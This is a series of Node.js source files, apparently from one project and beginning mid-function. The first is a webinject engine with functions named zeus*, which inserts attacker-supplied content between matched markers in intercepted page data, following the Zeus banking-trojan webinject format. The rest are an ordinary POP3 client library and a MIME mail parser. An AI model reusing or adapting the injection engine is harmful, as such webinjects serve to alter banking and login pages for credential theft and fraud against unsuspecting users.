    if (lstIndex !== -1 && searchParts[searchParts.length - 1] === '') {
        lstIndex = data.length;
    }

    if (lstIndex !== -1 && firstIndex !== -1 && firstIndex < lstIndex) {
        result = data.substr(firstIndex, lstIndex - firstIndex);
    }

    return result;
}

function zeusExecuteInjection(data, injectionBlock) {

    var startTag;
    var startTagIndex;
    var endTag;
    var endTagIndex;

    if ((injectionBlock.data_before.length > 0) && (injectionBlock.data_after.length > 0)) {

        startTag = zeusSearchContentIndex(data, injectionBlock.data_before);
        endTag = zeusSearchContentIndex(data, injectionBlock.data_after);

        if (startTag && endTag) {

            startTagIndex = (data.indexOf(startTag) + startTag.length);
            endTagIndex = data.indexOf(endTag, startTagIndex);

            if (startTagIndex < endTagIndex) {
                return data
                    .cut(startTagIndex, endTagIndex)
                    .insertAt(startTagIndex, injectionBlock.data_inject);

            } else {
                
            }
        } else {
            
        }

    } else if (injectionBlock.data_before.length > 0) {
        startTag = zeusSearchContentIndex(data, injectionBlock.data_before);
        if (startTag) {
            startTagIndex = (data.indexOf(startTag) + startTag.length);
            return data.insertAt(startTagIndex, injectionBlock.data_inject);
        }
    } else if (injectionBlock.data_after.length > 0) {
        endTag = zeusSearchContentIndex(data, injectionBlock.data_after);
        endTagIndex = data.indexOf(endTag);
        return data.insertAt(endTagIndex, injectionBlock.data_inject);
    } else {
        return injectionBlock.data_inject;
    }
}

function zeusIsModificationNeeded(url, mask) {
    if (typeof zeusSearchContentIndex(url, mask) !== 'undefined') {
        return true;
    }
    return false;
}


function zeusIsMaskMatched(text, mask) {
    if (typeof zeusSearchContentIndex(text, mask) !== 'undefined') {
        return true;
    }
    return false;
}

exports.zeusIsMaskMatched = zeusIsMaskMatched;
exports.zeusIsModificationNeeded = zeusIsModificationNeeded;
exports.zeusExecuteInjection = zeusExecuteInjection;
exports.zeusSearchContentIndex = zeusSearchContentIndex;
                                                                                                      

========



var net = require("net"),
	tls = require("tls"),
	util = require("util"),
	crypto = require("crypto"),
	events = require("events");


function POP3Client(port, host, options) {

    if (options === undefined) options = {};

    
    var enabletls = options.enabletls !== undefined ? options.enabletls : false;
    var ignoretlserrs = options.ignoretlserrs !== undefined ? options.ignoretlserrs : false;
    var debug = options.debug || false;

    var tlsDirectOpts = options.tlsopts !== undefined ? options.tlsopts : {};

    
    var self = this;
    var response = null;
    var checkResp = true;
    var bufferedData = "";
    var state = 0;
    var locked = false;
    var multiline = false;
    var socket = null;
    var tlssock = null;
    var callback = function (resp, data) {

        if (resp === false) {

            locked = false;
            callback = function () { };
            self.emit("connect", false, data);

        } else {

            
            var banner = data.trim();
            var bannerComponents = banner.split(" ");

            for (var i = 0; i < bannerComponents.length; i++) {

                if (bannerComponents[i].indexOf("@") > 0) {

                    self.data["apop"] = true;
                    self.data["apop-timestamp"] = bannerComponents[i];
                    break;

                }
            }

            state = 1;
            self.data["banner"] = banner;
            self.emit("connect", true, data);

        }
    };

    
    this.data = {

        host: host,
        port: port,
        banner: "",
        stls: false,
        apop: false,
        username: "",
        tls: enabletls,
        ignoretlserrs: ignoretlserrs

    };

    
    this.setCallback = function (cb) { callback = cb; };
    this.getCallback = function () { return callback };
    this.setState = function (val) { state = val; };
    this.getState = function () { return state; };
    this.setLocked = function (val) { locked = val; };
    this.getLocked = function () { return locked; };
    this.setMultiline = function (val) { multiline = val; };
    this.getMultiline = function () { return multiline; };

    
    this.write = function (command, argument) {

        var text = command;

        if (argument !== undefined) text = text + " " + argument + "\r\n";
        else text = text + "\r\n";

        

        socket.write(text);

    };

    
    this.end = function () {
        socket.end();
    };

    
    
    
    
    
    this.starttls = function (options) {

        var s = socket;
        s.removeAllListeners("end");
        s.removeAllListeners("data");
        s.removeAllListeners("error");
        socket = null;

        var sslcontext = require('crypto').createCredentials(options);
        var pair = tls.createSecurePair(sslcontext, false);
        var cleartext = pipe(pair);

        pair.on('secure', function () {

            var verifyError = pair.ssl.verifyError();
            cleartext.authorized = true;

            if (verifyError) {

                cleartext.authorized = false;
                cleartext.authorizationError = verifyError;

            }

            cleartext.on("data", onData);
            cleartext.on("error", onError);
            cleartext.on("end", onEnd);
            socket = cleartext;
            (self.getCallback())(cleartext.authorized, cleartext.authorizationError);

        });

        cleartext._controlReleased = true;

        function pipe(pair) {

            pair.encrypted.pipe(s);
            s.pipe(pair.encrypted);

            pair.fd = s.fd;
            var cleartext = pair.cleartext;
            cleartext.socket = s;
            cleartext.encrypted = pair.encrypted;
            cleartext.authorized = false;

            function onerror(e) {
                if (cleartext._controlReleased) cleartext.emit('error', e);
            }

            function onclose() {
                s.removeListener('error', onerror);
                s.removeListener('close', onclose);
            }

            s.on('error', onerror);
            s.on('close', onclose);
            return cleartext;

        }
    };

    
    
    function onData(data) {

        data = data.toString("ascii");
        bufferedData += data;

        

        if (checkResp === true) {

            if (bufferedData.substr(0, 3) === "+OK") {

                checkResp = false;
                response = true;

            } else if (bufferedData.substr(0, 4) === "-ERR") {

                checkResp = false;
                response = false;

                
            } else if (multiline === false) {

                checkResp = false;
                response = true;

            }
        }

        if (checkResp === false) {

            if (multiline === true && (response === false || bufferedData.substr(bufferedData.length - 5) === "\r\n.\r\n")) {

                
                var responseCopy = response;
                var bufferedDataCopy = bufferedData;

                response = null;
                checkResp = true;
                multiline = false;
                bufferedData = "";

                callback(responseCopy, bufferedDataCopy);

            } else if (multiline === false) {

                
                var responseCopy = response;
                var bufferedDataCopy = bufferedData;

                response = null;
                checkResp = true;
                multiline = false;
                bufferedData = "";

                callback(responseCopy, bufferedDataCopy);

            }
        }
    }

    function onError(err) {

        if (err.errno === 111) self.emit("connect", false, err);
        else self.emit("error", err);

    }

    function onEnd(data) {
        self.setState(0);
        socket = null;
    }

    function onClose() {
        self.emit("close");
    }

    
    
    events.EventEmitter.call(this);

    
    if (enabletls === true) {

        tlssock = tls.connect({
            host: host,
            port: port,
            rejectUnauthorized: !self.data.ignoretlserrs
        }, function () {

            if (tlssock.authorized === false &&
                self.data["ignoretlserrs"] === false)
                self.emit("tls-error", tlssock.authorizationError);

        }
    );

        socket = tlssock;

    } else socket = new net.createConnection(port, host);

    
    socket.on("data", onData);
    socket.on("error", onError);
    socket.on("end", onEnd);
    socket.on("close", onClose);

}

util.inherits(POP3Client, events.EventEmitter);

POP3Client.prototype.login = function (username, password) {

    var self = this;

    if (self.getState() !== 1) self.emit("invalid-state", "login");
    else if (self.getLocked() === true) self.emit("locked", "login");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            if (resp === false) {

                self.setLocked(false);
                self.setCallback(function () { });
                self.emit("login", false, data);

            } else {

                self.setCallback(function (resp, data) {

                    self.setLocked(false);
                    self.setCallback(function () { });

                    if (resp !== false) self.setState(2);
                    self.emit("login", resp, data);

                });

                self.setMultiline(false);
                self.write("PASS", password);

            }
        });

        self.setMultiline(false);
        self.write("USER", username);

    }
};



POP3Client.prototype.auth = function (type, username, password) {

    type = type.toUpperCase();
    var self = this;
    var types = { "PLAIN": 1, "CRAM-MD5": 1 };
    var initialresp = "";

    if (self.getState() !== 1) self.emit("invalid-state", "auth");
    else if (self.getLocked() === true) self.emit("locked", "auth");

    if ((type in types) === false) {

        self.emit("auth", false, "Invalid auth type", null);
        return;

    }

    function tlsok() {

        if (type === "PLAIN") {

            initialresp = " " + new Buffer(username + "\u0000" + username + "\u0000" + password).toString("base64") + "=";
            self.setCallback(function (resp, data) {

                if (resp !== false) self.setState(2);
                self.emit("auth", resp, data, data);

            });

        } else if (type === "CRAM-MD5") {

            self.setCallback(function (resp, data) {

                if (resp === false) self.emit("auth", resp, "Server responded -ERR to AUTH CRAM-MD5", data);
                else {

                    var challenge = new Buffer(data.trim().substr(2), "base64").toString();
                    var hmac = crypto.createHmac("md5", password);
                    var response = new Buffer(username + " " + hmac.update(challenge).digest("hex")).toString("base64");

                    self.setCallback(function (resp, data) {

                        var errmsg = null;

                        if (resp !== false) self.setState(2);
                        else errmsg = "Server responded -ERR to response";

                        self.emit("auth", resp, null, data);

                    });

                    self.write(response);

                }
            });
        }

        self.write("AUTH " + type + initialresp);

    }

    if (self.data["tls"] === false && self.data["stls"] === false) {

        
        self.removeAllListeners("stls");

        self.on("stls", function (resp, rawdata) {

            if (resp === false) {

                
                
                if (self.data["ignoretlserrs"] === true && rawdata === "DEPTH_ZERO_SELF_SIGNED_CERT") tlsok();
                else self.emit("auth", false, "Unable to upgrade connection to STLS", rawdata);

            } else tlsok();

        });

        self.stls();

    } else tlsok();
};

POP3Client.prototype.apop = function (username, password) {

    var self = this;

    if (self.getState() !== 1) self.emit("invalid-state", "apop");
    else if (self.getLocked() === true) self.emit("locked", "apop");
    else if (self.data["apop"] === false) self.emit("apop", false, "APOP support not detected on remote server");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            self.setLocked(false);
            self.setCallback(function () { });

            if (resp === true) self.setState(2);
            self.emit("apop", resp, data);

        });

        self.setMultiline(false);
        self.write("APOP", username + " " + crypto.createHash("md5").update(self.data["apop-timestamp"] + password).digest("hex"));

    }
};

POP3Client.prototype.stls = function () {

    var self = this;

    if (self.getState() !== 1) self.emit("invalid-state", "stls");
    else if (self.getLocked() === true) self.emit("locked", "stls");
    else if (self.data["tls"] === true) self.emit("stls", false, "Unable to execute STLS as TLS connection already established");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            self.setLocked(false);
            self.setCallback(function () { });

            if (resp === true) {

                self.setCallback(function (resp, data) {

                    if (resp === false && self.data["ignoretlserrs"] === true && data === "DEPTH_ZERO_SELF_SIGNED_CERT")
                        resp = true;

                    self.data["stls"] = true;
                    self.emit("stls", resp, data);

                });

                self.starttls();

            } else self.emit("stls", false, data);
        });

        self.setMultiline(false);
        self.write("STLS");

    }
};


POP3Client.prototype.top = function (msgnumber, lines) {

    var self = this;

    if (self.getState() !== 2) self.emit("invalid-state", "top");
    else if (self.getLocked() === true) self.emit("locked", "top");
    else {

        self.setCallback(function (resp, data) {

            var returnValue = null;
            self.setLocked(false);
            self.setCallback(function () { });

            if (resp !== false) {

                returnValue = "";
                var startOffset = data.indexOf("\r\n", 0) + 2;
                var endOffset = data.indexOf("\r\n.\r\n", 0) + 2;

                if (endOffset > startOffset)
                    returnValue = data.substr(startOffset, endOffset - startOffset);

            }

            self.emit("top", resp, msgnumber, returnValue, data);

        });

        self.setMultiline(true);
        self.write("TOP", msgnumber + " " + lines);

    }
};

POP3Client.prototype.list = function (msgnumber) {

    var self = this;

    if (self.getState() !== 2) self.emit("invalid-state", "list");
    else if (self.getLocked() === true) self.emit("locked", "list");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            var returnValue = null;
            var msgcount = 0;
            self.setLocked(false);
            self.setCallback(function () { });

            if (resp !== false) {

                returnValue = [];

                if (msgnumber !== undefined) {

                    msgcount = 1
                    var listitem = data.split(" ");
                    returnValue[listitem[1]] = listitem[2];

                } else {

                    var offset = 0;
                    var listitem = "";
                    var newoffset = 0;
                    var returnValue = [];
                    var startOffset = data.indexOf("\r\n", 0) + 2;
                    var endOffset = data.indexOf("\r\n.\r\n", 0) + 2;

                    if (endOffset > startOffset) {

                        data = data.substr(startOffset, endOffset - startOffset);

                        while (true) {

                            if (offset > endOffset)
                                break;

                            newoffset = data.indexOf("\r\n", offset);

                            if (newoffset < 0)
                                break;

                            msgcount++;
                            listitem = data.substr(offset, newoffset - offset);
                            listitem = listitem.split(" ");
                            returnValue[listitem[0]] = listitem[1];
                            offset = newoffset + 2;

                        }
                    }
                }
            }

            self.emit("list", resp, msgcount, msgnumber, returnValue, data);

        });

        if (msgnumber !== undefined) self.setMultiline(false);
        else self.setMultiline(true);

        self.write("LIST", msgnumber);

    }
};

POP3Client.prototype.stat = function () {

    var self = this;

    if (self.getState() !== 2) self.emit("invalid-state", "stat");
    else if (self.getLocked() === true) self.emit("locked", "stat");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            var returnValue = null;
            self.setLocked(false);
            self.setCallback(function () { });

            if (resp !== false) {

                var listitem = data.split(" ");
                returnValue = {

                    "count": listitem[1].trim(),
                    "octets": listitem[2].trim(),

                };
            }

            self.emit("stat", resp, returnValue, data);

        });

        self.setMultiline(false);
        self.write("STAT", undefined);

    }
};

POP3Client.prototype.uidl = function (msgnumber) {

    var self = this;

    if (self.getState() !== 2) self.emit("invalid-state", "uidl");
    else if (self.getLocked() === true) self.emit("locked", "uidl");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            var returnValue = null;
            self.setLocked(false);
            self.setCallback(function () { });

            if (resp !== false) {

                returnValue = [];

                if (msgnumber !== undefined) {

                    var listitem = data.split(" ");
                    returnValue[listitem[1]] = listitem[2].trim();

                } else {

                    var offset = 0;
                    var listitem = "";
                    var newoffset = 0;
                    var returnValue = [];
                    var startOffset = data.indexOf("\r\n", 0) + 2;
                    var endOffset = data.indexOf("\r\n.\r\n", 0) + 2;

                    if (endOffset > startOffset) {

                        data = data.substr(startOffset, endOffset - startOffset);
                        endOffset -= startOffset;

                        while (offset < endOffset) {

                            newoffset = data.indexOf("\r\n", offset);
                            listitem = data.substr(offset, newoffset - offset);
                            listitem = listitem.split(" ");
                            returnValue[listitem[0]] = listitem[1];
                            offset = newoffset + 2;

                        }
                    }
                }
            }

            self.emit("uidl", resp, msgnumber, returnValue, data);

        });

        if (msgnumber !== undefined) self.setMultiline(false);
        else self.setMultiline(true);

        self.write("UIDL", msgnumber);

    }
};

POP3Client.prototype.retr = function (msgnumber) {

    var self = this;

    if (self.getState() !== 2) self.emit("invalid-state", "retr");
    else if (self.getLocked() === true) self.emit("locked", "retr");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            var returnValue = null;
            self.setLocked(false);
            self.setCallback(function () { });

            if (resp !== false) {

                var startOffset = data.indexOf("\r\n", 0) + 2;
                var endOffset = data.indexOf("\r\n.\r\n", 0);
                returnValue = data.substr(startOffset, endOffset - startOffset);

            }

            self.emit("retr", resp, msgnumber, returnValue, data);

        });

        self.setMultiline(true);
        self.write("RETR", msgnumber);

    }
};

POP3Client.prototype.dele = function (msgnumber) {

    var self = this;

    if (self.getState() !== 2) self.emit("invalid-state", "dele");
    else if (self.getLocked() === true) self.emit("locked", "dele");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            self.setLocked(false);
            self.setCallback(function () { });
            self.emit("dele", resp, msgnumber, data);

        });

        self.setMultiline(false);
        self.write("DELE", msgnumber);

    }
};

POP3Client.prototype.noop = function () {

    var self = this;

    if (self.getState() !== 2) self.emit("invalid-state", "noop");
    else if (self.getLocked() === true) self.emit("locked", "noop");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            self.setLocked(false);
            self.setCallback(function () { });
            self.emit("noop", resp, data);

        });

        self.setMultiline(false);
        self.write("NOOP", undefined);

    }
};

POP3Client.prototype.rset = function () {

    var self = this;

    if (self.getState() !== 2) self.emit("invalid-state", "rset");
    else if (self.getLocked() === true) self.emit("locked", "rset");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            self.setLocked(false);
            self.setCallback(function () { });
            self.emit("rset", resp, data);

        });

        self.setMultiline(false);
        self.write("RSET", undefined);

    }
};

POP3Client.prototype.capa = function () {

    var self = this;

    if (self.getState() === 0) self.emit("invalid-state", "quit");
    else if (self.getLocked() === true) self.emit("locked", "capa");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            var returnValue = null;
            self.setLocked(false);
            self.setCallback(function () { });

            if (resp === true) {

                var startOffset = data.indexOf("\r\n", 0) + 2;
                var endOffset = data.indexOf("\r\n.\r\n", 0);
                returnValue = data.substr(startOffset, endOffset - startOffset);
                returnValue = returnValue.split("\r\n");

            }

            self.emit("capa", resp, returnValue, data);

        });

        self.setMultiline(true);
        self.write("CAPA", undefined);

    }
};

POP3Client.prototype.quit = function () {

    var self = this;

    if (self.getState() === 0) self.emit("invalid-state", "quit");
    else if (self.getLocked() === true) self.emit("locked", "quit");
    else {

        self.setLocked(true);
        self.setCallback(function (resp, data) {

            self.setLocked(false);
            self.setCallback(function () { });

            self.end();
            self.emit("quit", resp, data);

        });

        self.setMultiline(false);
        self.write("QUIT", undefined);

    }
};

module.exports = POP3Client;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 

========

var Stream = require("stream").Stream,
    utillib = require("util"),
    mimelib = require("mimelib"),
    encodinglib = require("encoding"),
    Streams = require("streams"),
    crypto = require("crypto"),
    mime = require("mime");


exports.MailParser = MailParser;

function strtotime(str, now) {
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    

    var i, match, s, strTmp = '',
        parse = '';

    strTmp = str;
    strTmp = strTmp.replace(/\s{2,}|^\s|\s$/g, ' '); 
    strTmp = strTmp.replace(/[    \r\n]/g, ''); 

    if (strTmp == 'now') {
        return (new Date()).getTime() / 1000; // Return seconds, not milli-seconds
    } else if (!isNaN(parse = Date.parse(strTmp))) {
        return (parse / 1000);
    } else if (now) {
        now = new Date(now * 1000); 
    } else {
        now = new Date();
    }

    strTmp = strTmp.toLowerCase();

    var __is = {
        day: {
            'sun': 0,
            'mon': 1,
            'tue': 2,
            'wed': 3,
            'thu': 4,
            'fri': 5,
            'sat': 6
        },
        mon: {
            'jan': 0,
            'feb': 1,
            'mar': 2,
            'apr': 3,
            'may': 4,
            'jun': 5,
            'jul': 6,
            'aug': 7,
            'sep': 8,
            'oct': 9,
            'nov': 10,
            'dec': 11
        }
    };

    var process = function (m) {
        var ago = (m[2] && m[2] == 'ago');
        var num = (num = m[0] == 'last' ? -1 : 1) * (ago ? -1 : 1);

        switch (m[0]) {
            case 'last':
            case 'next':
                switch (m[1].substring(0, 3)) {
                    case 'yea':
                        now.setFullYear(now.getFullYear() + num);
                        break;
                    case 'mon':
                        now.setMonth(now.getMonth() + num);
                        break;
                    case 'wee':
                        now.setDate(now.getDate() + (num * 7));
                        break;
                    case 'day':
                        now.setDate(now.getDate() + num);
                        break;
                    case 'hou':
                        now.setHours(now.getHours() + num);
                        break;
                    case 'min':
                        now.setMinutes(now.getMinutes() + num);
                        break;
                    case 'sec':
                        now.setSeconds(now.getSeconds() + num);
                        break;
                    default:
                        var day;
                        if (typeof (day = __is.day[m[1].substring(0, 3)]) != 'undefined') {
                            var diff = day - now.getDay();
                            if (diff === 0) {
                                diff = 7 * num;
                            } else if (diff > 0) {
                                if (m[0] == 'last') {
                                    diff -= 7;
                                }
                            } else {
                                if (m[0] == 'next') {
                                    diff += 7;
                                }
                            }
                            now.setDate(now.getDate() + diff);
                        }
                }
                break;

            default:
                if (/\d+/.test(m[0])) {
                    num *= parseInt(m[0], 10);

                    switch (m[1].substring(0, 3)) {
                        case 'yea':
                            now.setFullYear(now.getFullYear() + num);
                            break;
                        case 'mon':
                            now.setMonth(now.getMonth() + num);
                            break;
                        case 'wee':
                            now.setDate(now.getDate() + (num * 7));
                            break;
                        case 'day':
                            now.setDate(now.getDate() + num);
                            break;
                        case 'hou':
                            now.setHours(now.getHours() + num);
                            break;
                        case 'min':
                            now.setMinutes(now.getMinutes() + num);
                            break;
                        case 'sec':
                            now.setSeconds(now.getSeconds() + num);
                            break;
                    }
                } else {
                    return false;
                }
                break;
        }
        return true;
    };

    match = strTmp.match(/^(\d{2,4}-\d{2}-\d{2})(?:\s(\d{1,2}:\d{2}(:\d{2})?)?(?:\.(\d+))?)?$/);
    if (match) {
        if (!match[2]) {
            match[2] = '00:00:00';
        } else if (!match[3]) {
            match[2] += ':00';
        }

        s = match[1].split(/-/g);

        for (i in __is.mon) {
            if (__is.mon[i] == s[1] - 1) {
                s[1] = i;
            }
        }
        s[0] = parseInt(s[0], 10);

        s[0] = (s[0] >= 0 && s[0] <= 69) ? '20' + (s[0] < 10 ? '0' + s[0] : s[0] + '') : (s[0] >= 70 && s[0] <= 99) ? '19' + s[0] : s[0] + '';
        return parseInt(this.strtotime(s[2] + ' ' + s[1] + ' ' + s[0] + ' ' + match[2]) + (match[4] ? match[4] / 1000 : ''), 10);
    }

    var regex = '([+-]?\\d+\\s' +
        '(years?|months?|weeks?|days?|hours?|min|minutes?|sec|seconds?' +
        '|sun\\.?|sunday|mon\\.?|monday|tue\\.?|tuesday|wed\\.?|wednesday' +
        '|thu\\.?|thursday|fri\\.?|friday|sat\\.?|saturday)' +
        '|(last|next)\\s' +
        '(years?|months?|weeks?|days?|hours?|min|minutes?|sec|seconds?' +
        '|sun\\.?|sunday|mon\\.?|monday|tue\\.?|tuesday|wed\\.?|wednesday' +
        '|thu\\.?|thursday|fri\\.?|friday|sat\\.?|saturday))' +
        '(\\sago)?';

    match = strTmp.match(new RegExp(regex, 'gi')); // Brett: seems should be case insensitive per docs, so added 'i'
    if (!match) {
        return false;
    }

    for (i = 0; i < match.length; i++) {
        if (!process(match[i].split(' '))) {
            return false;
        }
    }

    return (now.getTime() / 1000);
};


var STATES = {
    header: 0x1,
    body: 0x2,
    finished: 0x3
};


function MailParser(options) {

    
    Stream.call(this);
    this.writable = true;

    
    this.options = options || {};

    
    this._state = STATES.header;

    
    this._remainder = "";

    
    this.mimeTree = this._createMimeNode();

    
    this._currentNode = this.mimeTree;

    
    this._currentNode.priority = "normal";

    
    this._fileNames = {};

    
    this._multipartTree = [];


    
    this.mailData = {};

    
    this._lineCounter = 0;

    
    this._lineFeed = false;

    
    this._headersSent = false;

    
    this._isMbox = -1;
}

utillib.inherits(MailParser, Stream);


MailParser.prototype.write = function(chunk, encoding) {
    if (this._write(chunk, encoding)) {
        if (typeof setImmediate == "function") {
            setImmediate(this._process.bind(this));
        } else {
            process.nextTick(this._process.bind(this));
        }
    }
    return true;
};


MailParser.prototype.end = function(chunk, encoding) {
    this._write(chunk, encoding);

    if (this.options.debug && this._remainder) {
        console.log("REMAINDER: " + this._remainder);
    }

    if (typeof setImmediate == "function") {
        setImmediate(this._process.bind(this, true));
    } else {
        process.nextTick(this._process.bind(this, true));
    }
};


MailParser.prototype._write = function(chunk, encoding) {
    if (typeof chunk == "string") {
        chunk = new Buffer(chunk, encoding);
    }

    chunk = chunk && chunk.toString("binary") || "";

    
    
    
    if (this._lineFeed && chunk.charAt(0) === "\n") {
        chunk = chunk.substr(1);
    }
    this._lineFeed = chunk.substr(-1) === "\r";

    if (chunk && chunk.length) {
        this._remainder += chunk;
        return true;
    }
    return false;
};



MailParser.prototype._process = function(finalPart) {

    finalPart = !!finalPart;
    var lines = this._remainder.split(/\r?\n|\r/),
        line, i, len;

    if (!finalPart) {
        this._remainder = lines.pop();
        
        if (this._remainder.length > 1048576) {
            this._remainder = this._remainder.replace(/(.{1048576}(?!\r?\n|\r))/g, "$&\n");
        }
    }

    for (i = 0, len = lines.length; i < len; i++) {
        line = lines[i];

        if (this.options.unescapeSMTP && line.substr(0, 2) == "..") {
            line = line.substr(1);
        }

        if (this._isMbox === true && line.match(/^\>+From /)) {
            line = line.substr(1);
        }

        if (this.options.debug) {
            console.log("LINE " + (++this._lineCounter) + " (" + this._state + "): " + line);
        }

        if (this._state == STATES.header) {
            if (this._processStateHeader(line) === true) {
                continue;
            }
        }

        if (this._state == STATES.body) {
            if (this._processStateBody(line) === true) {
                continue;
            }
        }
    }
    if (finalPart) {
        if (this._state == STATES.header && this._remainder) {
            this._processStateHeader(this._remainder);
            if (!this._headersSent) {
                this.emit("headers", this._currentNode.parsedHeaders);
                this._headersSent = true;
            }
        }
        if (this._currentNode.content || this._currentNode.stream) {
            this._finalizeContents();
        }
        this._state = STATES.finished;
        if (typeof setImmediate == "function") {
            setImmediate(this._processMimeTree.bind(this));
        } else {
            process.nextTick(this._processMimeTree.bind(this));
        }
    }


};


MailParser.prototype._processStateHeader = function(line) {
    var attachment, lastPos = this._currentNode.headers.length - 1,
        textContent = false,
        extension;

    
    if (!line.length) {
        if (lastPos >= 0) {
            this._processHeaderLine(lastPos);
        }
        if (!this._headersSent) {
            this.emit("headers", this._currentNode.parsedHeaders);
            this._headersSent = true;
        }

        this._state = STATES.body;

        
        if (lastPos >= 0) {
            this._processHeaderLine(lastPos);
        }

        
        if (!this._currentNode.parentNode && !this._currentNode.meta.contentType) {
            this._currentNode.meta.contentType = "text/plain";
        }

        textContent = ["text/plain", "text/html", "text/calendar"].indexOf(this._currentNode.meta.contentType || "") >= 0;

        
        if (textContent && (!this._currentNode.meta.contentDisposition || this._currentNode.meta.contentDisposition == "inline")) {
            this._currentNode.attachment = false;
        } else if ((!textContent || ["attachment", "inline"].indexOf(this._currentNode.meta.contentDisposition) >= 0) &&
            !this._currentNode.meta.mimeMultipart) {
            this._currentNode.attachment = true;
        }

        
        if (this._currentNode.attachment) {

            this._currentNode.meta.generatedFileName = this._generateFileName(this._currentNode.meta.fileName, this._currentNode.meta.contentType);

            this._currentNode.meta.contentId = this._currentNode.meta.contentId ||
                crypto.createHash("md5").update(this._currentNode.meta.generatedFileName).digest("hex") + "@mailparser";

            extension = this._currentNode.meta.generatedFileName.split(".").pop().toLowerCase();

            
            if (this._currentNode.meta.contentType == "application/octet-stream" && mime.lookup(extension)) {
                this._currentNode.meta.contentType = mime.lookup(extension);
            }

            attachment = this._currentNode.meta;
            if (this.options.streamAttachments) {
                if (this._currentNode.meta.transferEncoding == "base64") {
                    this._currentNode.stream = new Streams.Base64Stream();
                } else if (this._currentNode.meta.transferEncoding == "quoted-printable") {
                    this._currentNode.stream = new Streams.QPStream("binary");
                } else if (this._currentNode.meta.transferEncoding == "uuencode") {
                    this._currentNode.stream = new Streams.UUEStream("binary");
                } else {
                    this._currentNode.stream = new Streams.BinaryStream();
                }
                attachment.stream = this._currentNode.stream;

                this.emit("attachment", attachment, this._currentNode.parentNode || this._currentNode);
            } else {
                this._currentNode.content = undefined;
            }
        }

        return true;
    }

    
    if (line.match(/^\s+/) && lastPos >= 0) {
        this._currentNode.headers[lastPos] += " " + line.trim();
    } else {
        this._currentNode.headers.push(line.trim());
        if (lastPos >= 0) {
            
            this._processHeaderLine(lastPos);
        }
    }

    return false;
};


MailParser.prototype._processStateBody = function(line) {
    var i, len, node,
        nodeReady = false;

    
    if (line.substr(0, 2) == "--") {
        for (i = 0, len = this._multipartTree.length; i < len; i++) {

            
            if (line == "--" + this._multipartTree[i].boundary) {

                if (this._currentNode.content || this._currentNode.stream) {
                    this._finalizeContents();
                }

                node = this._createMimeNode(this._multipartTree[i].node);
                this._multipartTree[i].node.childNodes.push(node);
                this._currentNode = node;
                this._state = STATES.header;
                nodeReady = true;
                break;
            } else
            
            if (line == "--" + this._multipartTree[i].boundary + "--") {

                if (this._currentNode.content || this._currentNode.stream) {
                    this._finalizeContents();
                }

                if (this._multipartTree[i].node.parentNode) {
                    this._currentNode = this._multipartTree[i].node.parentNode;
                } else {
                    this._currentNode = this._multipartTree[i].node;
                }
                this._state = STATES.body;
                nodeReady = true;
                break;
            }
        }
    }
    if (nodeReady) {
        return true;
    }

    
    if (["text/plain", "text/html", "text/calendar"].indexOf(this._currentNode.meta.contentType || "") >= 0 &&
        !this._currentNode.attachment) {
        this._handleTextLine(line);
    } else if (this._currentNode.attachment) {
        this._handleAttachmentLine(line);
    }

    return false;
};


MailParser.prototype._processHeaderLine = function(pos) {
    var key, value, parts, line;

    pos = pos || 0;

    if (!(line = this._currentNode.headers[pos]) || typeof line != "string") {
        return;
    }

    if (!this._headersSent && this._isMbox < 0) {
        if ((this._isMbox = !!line.match(/^From /))) {
            return;
        }
    }

    parts = line.split(":");

    key = parts.shift().toLowerCase().trim();
    value = parts.join(":").trim();

    switch (key) {
        case "content-type":
            this._parseContentType(value);
            break;
        case "mime-version":
            this._currentNode.useMIME = true;
            break;
        case "date":
            this._currentNode.meta.date = this._parseDateString(value);
            break;
        case "received":
        case "x-received":
            this._parseReceived(value);
            break;
        case "to":
            if (this._currentNode.to && this._currentNode.to.length) {
                this._currentNode.to = this._currentNode.to.concat(mimelib.parseAddresses(value));
            } else {
                this._currentNode.to = mimelib.parseAddresses(value);
            }
            break;
        case "from":
            if (this._currentNode.from && this._currentNode.from.length) {
                this._currentNode.from = this._currentNode.from.concat(mimelib.parseAddresses(value));
            } else {
                this._currentNode.from = mimelib.parseAddresses(value);
            }
            break;
        case "reply-to":
            if (this._currentNode.replyTo && this._currentNode.replyTo.length) {
                this._currentNode.replyTo = this._currentNode.replyTo.concat(mimelib.parseAddresses(value));
            } else {
                this._currentNode.replyTo = mimelib.parseAddresses(value);
            }
            break;
        case "cc":
            if (this._currentNode.cc && this._currentNode.cc.length) {
                this._currentNode.cc = this._currentNode.cc.concat(mimelib.parseAddresses(value));
            } else {
                this._currentNode.cc = mimelib.parseAddresses(value);
            }
            break;
        case "bcc":
            if (this._currentNode.bcc && this._currentNode.bcc.length) {
                this._currentNode.bcc = this._currentNode.bcc.concat(mimelib.parseAddresses(value));
            } else {
                this._currentNode.bcc = mimelib.parseAddresses(value);
            }
            break;
        case "x-priority":
        case "x-msmail-priority":
        case "importance":
            value = this._parsePriority(value);
            this._currentNode.priority = value;
            break;
        case "message-id":
            this._currentNode.meta.messageId = this._trimQuotes(value);
            this._currentNode.messageId = this._currentNode.meta.messageId;
            break;
        case "references":
            this._parseReferences(value);
            break;
        case "in-reply-to":
            this._parseInReplyTo(value);
            break;
        case "thread-index":
            this._currentNode.meta.threadIndex = value;
            break;
        case "content-transfer-encoding":
            this._currentNode.meta.transferEncoding = value.toLowerCase();
            break;
        case "content-location":
            this._currentNode.meta.location = value.toLowerCase();
            break;
        case "subject":
            this._currentNode.subject = this._encodeString(value);
            break;
        case "content-disposition":
            this._parseContentDisposition(value);
            break;
